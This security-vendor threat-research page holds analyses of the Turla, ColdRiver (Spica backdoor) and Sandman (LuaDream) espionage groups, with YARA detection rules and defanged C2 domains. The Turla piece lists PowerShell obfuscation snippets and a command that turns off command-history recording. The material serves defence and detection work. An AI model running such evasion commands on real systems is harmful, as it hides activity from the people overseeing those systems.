company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Infostealer

loading..
loading..
loading..

AgentTesla's Deceptive Tactics: Analyzing CHM Extension Distribution

Explore the stealthy tactics of AgentTesla, distributed via deceptive CHM files in emails, posing as order-related attachments

17-Jan-2024
4 min read

Related Articles

loading..

Turla

APT

Uncover the latest tactics of Russia's Turla APT. This technical report analyze...

Turla, a Russian state-sponsored Advanced Persistent Threat (APT) group, conducts sophisticated cyberespionage against government institutions, NGOs, and organizations aligned with Russian interests. This [Threat Research](https://www.secureblink.com/threat-research) provides a detailed analysis of Turla's historical context, recent operations named "Turla Wields," and a thorough technical analysis of their tools and techniques. ### Origins and Historical Context Turla, also known as Snake, Uroburos, Waterbug, and Venomous Bear, emerged in the late 1990s, targeting governments and militaries globally. Their operations align with Russia's geopolitical interests, focusing on nations bordering Russia and former Soviet states. Turla is adept at evading detection, preferring long-term intelligence gathering over disruptive attacks. ### Turla Wields: Recent Attack Trends and Targeting Recent campaigns target NGOs, particularly those supporting Ukrainian causes. Turla exploits legacy infections like Andromeda botnet, employs spear-phishing with weaponized PDFs, and constantly evolves its toolkit, including TinyTurla-NG and TurlaPower-NG. Motives range from military intelligence gathering to destabilizing opposition parties and supporting hybrid warfare. ### Technical Analysis of Turla Techniques Turla's initial infection vectors include spear-phishing, zero-day vulnerabilities, and compromised websites. They establish persistence using TinyTurla-NG, leveraging DLL loading and file masquerading. Communication with command and control servers is disguised within regular web traffic, employing redundant C2s for resilience. ### Data Exfiltration Techniques Turla employs custom tools like TurlaPower-NG to target password managers and browser history databases. Data exfiltration involves file archiving and staged uploads, obscuring their activities over time. ### "Living off the Land" Approach Turla increasingly relies on PowerShell for operations, employing obfuscation techniques and disabling command history recording to evade detection. ### Countermeasures and Defense Considerations Patching vulnerabilities, especially zero-days, is crucial. Endpoint Detection and Response (EDR) platforms with behavioral baselining and anomaly detection can spot Turla's subtle activities. Application and script whitelisting, along with security awareness training, enhance defenses. Web infrastructure hardening and intrusion detection systems are also recommended. ## Technical Analysis: Evolving Toolset Breakdown ### TinyTurla-NG and TurlaPower-NG Deep Dive #### TinyTurla-NG - Network Protocols: HTTP/HTTPS with custom headers and unusual User-Agent strings. - C2 Commands: Task scheduling logic and data encoding for exfiltration. - Persistence: Registry hiding, DLL hijacking methods, and boot-time execution. #### TurlaPower-NG - Target Files: Focus on password managers and browser history SQLite databases. - Data Extraction Logic: Parsing methods and obfuscation techniques. - Archiving: Compression and encryption methods used for file uploads. ### Obfuscation and Anti-Forensics Turla employs meaningless variable names, packed executables, and sandbox evasion techniques to hinder analysis. They ensure minimal forensic traces by cleaning temporary files and overwriting disk images. ### Historical Malware Progression Turla's tools have evolved from executable-based to PowerShell-based, leveraging trusted Windows programs for stealth and adaptability. Staged exfiltration and variable beaconing remain consistent features across toolsets. ## Victim Profiling & Targeting Patterns ### Target Industries & Organizations Turla targets a range of industries, including defense, technology, government, diplomacy, and NGOs. Specific organizations and job titles vary, with a focus on technical staff for network compromise and decision-makers for policy insight. ### Geographic Shifts & Geopolitical Correlation Turla's targeting intensifies around geopolitical events involving Russia, such as elections and conflicts. Analysis reveals patterns of intelligence gathering preceding significant actions, indicating strategic alignment with Russian interests. ## Code Snippets for Detection The following are representative indicators based on open-sourced reports on TinyTurla-NG and similar C2 mechanisms Turla often uses. Use with caution – APTs evolve, so these patterns may change in future samples: `Registry Modification (Possible Turla DLL Loading)` HKEY_CURRENT_USER\Software\Classes\CLSID\{<unusual-looking-GUID>} –Suspicious values within this key can point to persistence via COM object loading `Unusual HTTP Beaconing Traffic Patterns` # Example YARA-like Pattern – simplified - targeting WordPress C2 traffic rule turla_wp_beacon { meta: description = "Possible Turla compromise of WordPress sites for C2" author = "<Your Org Name>" date = "2024-02-27" strings: $http_header = {Content-Type: multipart/form-data;} $beacon_id = /page=[0-9]{8}/ condition: $http_header and $beacon_id and all of them } `PowerShell Obfuscation Techniques (Simplified Examples)` PowerShell # Base64 Encoding to Conceal Commands $cmd = "iex <base64 encoded command>" Invoke-Expression $cmd # Modifying Command Execution Flow $var = 'Something'; $var[3..1] -join '' # Reconstructs a hidden string # PowerShell History Evasion Set-PSReadLineOption -HistorySaveStyle SaveNothing ## Conclusion Turla's persistence and adaptability make them a formidable threat to global security. Understanding their techniques and motivations is crucial for developing effective defense strategies. By implementing rigorous countermeasures and leveraging threat intelligence, organizations can mitigate the risk posed by Turla's cyberespionage activities.

loading..   21-Feb-2024
loading..   1 min read
loading..

APT

Phishing

Explore ColdRiver's Spica malware in this detailed threat analysis. Uncover Russ...

ColdRiver, a Russia-backed advanced persistent threat (APT) group, has advanced cyber espionage tactics by introducing a custom malware named "Spica." This marks a substantial departure from their traditional long-con credential phishing methods. Google's Threat Analysis Group (TAG) has been actively instrumental in tracking ColdRiver's activities, highlighting their ever-evolving techniques. This [Threat Research](https://www.secureblink.com/threat-research) aims to extend this analysis of ColdRiver, dissecting and scrutinizing the critical underlying aspects of its Spica malware, emphasizing the threat landscape and potential countermeasures. ## Contextual Background ColdRiver, also known as Blue Charlie, Callisto, Star Blizzard, or UNC4057, primarily targets high-profile individuals in NGOs, former intelligence and military officials, and NATO governments. Historically focused on credential phishing, the group has now extended its capabilities to deliver malware, specifically using PDFs as lure documents. ## Evolution of Tactics The progression from traditional phishing to malware delivery is a strategic transition [observed](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/) by TAG. ColdRiver employs impersonation accounts, posing as experts or individuals affiliated with the target, to establish trust. Recent findings reveal an intricate tactic where benign PDFs, presented as op-eds or articles, are delivered to targets. If the target cannot decipher the encrypted content, a link to a "decryption" utility is sent, introducing the Spica backdoor. ## Spica Malware Analysis ### Infiltration and Execution Spica, written in Rust, utilizes JSON over websockets for command and control (C2). Upon execution, it decodes an embedded PDF, serving as a decoy while establishing persistence and connecting to the C2 server. The malware deploys an obfuscated PowerShell command, creating a scheduled task named "CalendarChecker" for persistence. ### Functional Capabilities Spica functions as a versatile tool, executing arbitrary shell commands, stealing cookies from various browsers, uploading and downloading files, perusing the filesystem, and enumerating documents for exfiltration. The presence of multiple variants suggests a continuous evolution of the backdoor. ### Timeline and Persistence TAG first observed Spica in September 2023, but they believe its usage dates back to November 2022. The malware, identified as "Proton-decrypter.exe," was likely active around August and September 2023. TAG notes the potential existence of multiple Spica versions, each with distinct embedded decoy documents. ## Implications and Targets ColdRiver's strategic shift indicates a desire for broader capabilities, allowing them to conduct operations beyond conventional phishing. The targets include Ukraine, NATO countries, academic institutions, and NGOs. While specific victim profiles remain undisclosed, TAG emphasizes the limited and targeted use of Spica, aligning with ColdRiver's established tactics. ## Defensive Measures To counter the ColdRiver threat, TAG emphasizes proactive security measures. All identified domains, websites, and files associated with the threat are added to Safe Browsing blocklists. Gmail and Workspace users targeted by government-backed attackers receive alerts, encouraging them to enable Enhanced Safe Browsing for Chrome and ensure device updates. ## Code and Technical Insights ### Spica Backdoor Code TAG provides a YARA rule for detecting the Spica backdoor, outlining specific strings and patterns indicative of its presence. This code analysis aids cybersecurity professionals in identifying and mitigating potential threats. ```yara rule SPICA__Strings { meta: author = “Google TAG” description = "Rust backdoor using websockets for C2 and embedded decoy PDF" hash = "37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9" strings: $s1 = "os_win.c:%d: (%lu) %s(%s) - %s" $s2 = "winWrite1" $s3 = "winWrite2" $s4 = "DNS resolution panicked" $s5 = "struct Dox" $s6 = "struct Telegram" $s8 = "struct Download" $s9 = "spica" $s10 = "Failed to open the subkey after setting the value." $s11 = "Card Holder: Bull Gayts" $s12 = "Card Number: 7/ 3310 0195 4865" $s13 = "CVV: 592" $s14 = "Card Expired: 03/28" $a0 = "agent\\src\\archive.rs" $a1 = "agent\\src\\main.rs" $a2 = "agent\\src\\utils.rs" $a3 = "agent\\src\\command\\dox.rs" $a4 = "agent\\src\\command\\shell.rs" $a5 = "agent\\src\\command\\telegram.rs" $a6 = "agent\\src\\command\\mod.rs" $a7 = "agent\\src\\command\\mod.rs" $a8 = "agent\\src\\command\\cookie\\mod.rs" $a9 = "agent\\src\\command\\cookie\\browser\\mod.rs" $a10 = "agent\\src\\command\\cookie\\browser\\browser_name.rs" condition: 7 of ($s*) or 5 of ($a*) }. ``` ## Conclusion ColdRiver's adoption of the Spica malware turned out to be a calculated evolution in their threat evolution. This extended analysis presented here offers a thorough breakdown of these tactics and techniques, Spica's technical intricacies, and recommended defensive measures.

loading..   31-Jan-2024
loading..   1 min read
loading..

APT

Sandman, a mysterious APT group out of unknown origin, strategically targets tel...

Sandman APT emerges as a mysterious actor targeting telecommunication providers. This [Threat Research](https://www.secureblink.com/threat-research) thoroughly delves deeper into its maliciously tactical activities, particularly concentrating on the LuaJIT toolkit and the LuaDream modular backdoor. ### Sandman's Strategic Approach Sandman, a threat actor of unknown origin, strategically targets telecommunication providers in the Middle East, Western Europe, and South Asia. Characterized by strategic lateral movements and minimal engagements, Sandman aims to achieve objectives while evading detection. ### LuaJIT Toolkit Adoption Sandman's novel modular backdoor, LuaDream, stands out for utilizing the LuaJIT platform—a rare occurrence in the threat landscape. The LuaDream implementation reflects a well-executed, actively developed project of considerable scale. ## LuaDream: A Deep Dive ### Architecture and Development Style LuaDream, a multi-protocol backdoor, excels in managing attacker-provided plugins and exfiltrating system and user information. Its architecture, consisting of 34 components, indicates a project of substantial scale. #### Code Comment Insight Intriguingly, a code comment in LuaDream's main_proto_WinHttpServer component hints at potential Chinese origin, adding a layer of complexity to Sandman's attribution. ```lua -- Code comment (translates from Chinese to “returned handle”) ``` ### Intricate Staging Process LuaDream's staging process involves seven main stages conducted thoroughly in memory, showcasing an intricate design focused on evading detection. Anti-analysis measures include thread hiding and detection of sandboxes. #### DLL Timestamp Analysis Analysis of DLL timestamps, while acknowledging potential manipulation, suggests authentic proximity to the intrusion date, indicating meticulous planning. ### Sandman's Espionage Motivations The targeted approach, advanced techniques, and victimology suggest Sandman's likely espionage motivations. Telecommunication providers, holding sensitive data, become prime targets in this landscape. ### Network Infrastructure Evolution Sandman's network infrastructure evolution from ssl.explorecell[.]com to mode.encagil[.]com reflects an intentional shift to cloud-based reverse proxy infrastructure, enhancing operational security. ```markdown - SSL.explorecell[.]com to mode.encagil[.]com - Utilization of cloud-based reverse proxy for enhanced security ``` ## Sandman vs. STORM-0866/Red Dev 40 ### Shared Infrastructure Practices Sandman shares infrastructure control and management practices with the STORM-0866/Red Dev 40 APT cluster, emphasizing cooperation and coordination among China-based threat groups. #### Domain Certificate Overlaps Analysis reveals SSL certificate overlaps between Sandman's LuaDream C2 domain and STORM-0866/Red Dev 40's dan.det-ploshadka[.]com, highlighting potential collaboration or shared resources. ```markdown - SSL certificate overlaps: ssl.explorecell[.]com and dan.det-ploshadka[.]com - Shared domain certificates indicating potential collaboration ``` ## LuaDream and KEYPLUG Collaboration ### Shared Development Practices While LuaDream and KEYPLUG are distinct, they exhibit indicators of shared development practices, including infrastructure control, design overlaps, and functionalities. This suggests a cohesive approach by their operators. #### Modular Design and Functionality Overlaps The modular design and functionality overlaps between LuaDream and KEYPLUG further emphasize shared requirements by the threat actors, showcasing the evolving nature of China-based threat landscapes. ```markdown - Modular design similarities between LuaDream and KEYPLUG - Overlapping functionalities indicating shared requirements ``` ### Lua-Based APT Landscape Evolution Historically associated with Western actors, the Lua development paradigm is now embraced by a broader set of cyberespionage threat actors. Sandman's use of LuaDream signifies a shift in development preferences for its modularity, portability, and simplicity. ## Sandman's Targeted Activities ### Victimology and Activities Sandman's targeted activities, observed primarily in the telecommunication sector, demonstrate a meticulous focus on specific workstations. The threat actor exhibits a deliberate approach, limiting actions to minimize detection risks. #### Implementation Timeline Compilation timestamps and artifacts within LuaDream hint at development efforts dating back to 2022, suggesting a persistent threat actor engaging in espionage activities over time. ```markdown - Compilation timestamps hinting at development since 2022 - Persistent threat actor engagement in espionage activities ``` ### Infiltration Techniques Sandman employs sophisticated infiltration techniques, including stealing administrative credentials and utilizing the pass-the-hash technique over the NTLM authentication protocol. Strategic patience is evident in waiting for system boot services to load malicious components. #### DLL Hijacking Technique The DLL hijacking technique, with ualapi.dll masquerading as a legitimate component, showcases Sandman's methodical approach to execute LuaDream without service restarts for evasion. ```markdown - Strategic patience in waiting for system boot services - DLL hijacking technique for discreet LuaDream execution ``` ### LuaDream Staging Process The LuaDream staging process, executed fully in memory, involves intricate steps to evade detection. The use of LuaJIT as a just-in-time compiler enhances the difficulty of detecting malicious Lua script code. ```markdown - LuaDream staging fully in memory for evasion - LuaJIT usage for obfuscation and detection evasion ``` ### Communication Protocols LuaDream and KEYPLUG, both highly modular, implement support for HTTP, TCP, WebSocket, and QUIC protocols for C2 communication. The adoption of QUIC and WebSocket together is a rare feature, possibly reflecting shared functional requirements. ```markdown - Adoption of QUIC and WebSocket for C2 communication - Shared functional requirements in LuaDream and KEYPLUG ``` ## Conclusion In the evolving landscape of cyber threats, Sandman APT exemplifies the intricate nature of China-based threat clusters. The collaboration with STORM-0866/Red Dev 40, shared development practices, and the adoption of LuaDream underscore the complexity and cooperation within this threat landscape. ### Ongoing Monitoring While acknowledging the association of Sandman with China-based adversaries, ongoing monitoring is crucial. The distinct cluster status of Sandman is maintained, pending further conclusive information. #### Broader Lua Development Paradigm Adoption Sandman's use of LuaDream signals a broader adoption of the Lua development paradigm in cyberespionage. This paradigm, historically Western-aligned, now extends to a diverse set of threat actors for its modularity and simplicity. ```markdown - Ongoing monitoring of Sandman's distinct cluster status - Broader adoption of Lua development paradigm in cyberespionage ```

loading..   10-Jan-2024
loading..   1 min read